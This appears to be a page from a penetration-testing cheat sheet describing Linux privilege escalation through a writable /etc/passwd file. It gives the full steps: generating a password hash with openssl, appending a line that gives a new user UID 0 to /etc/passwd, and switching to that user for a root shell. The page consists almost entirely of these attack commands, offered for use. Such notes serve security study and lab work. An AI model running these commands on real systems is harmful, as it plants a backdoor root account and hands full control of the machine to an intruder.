Password Authentication

The /etc/passwd file can contain password hashes directly instead of an x, indicating that the password hash is stored in /etc/shadow. If /etc/passwd is writable, it allows the creation of arbitrary users with root privileges.

  1. generate a hash using openssl

openssl passwd <password>

  1. Edit the /etc/passwd file

echo "<new_username>:<hash>:0:0:root:/root:/bin/bash" >> /etc/passwd

  1. Login to the newly created user with root previliges

su <new_username>

References

LogoEditing /etc/passwd File for Privilege EscalationHacking Articles
Raj Chandel’s Blog
PreviousScheduled tasksNextMonitor Processes

Last updated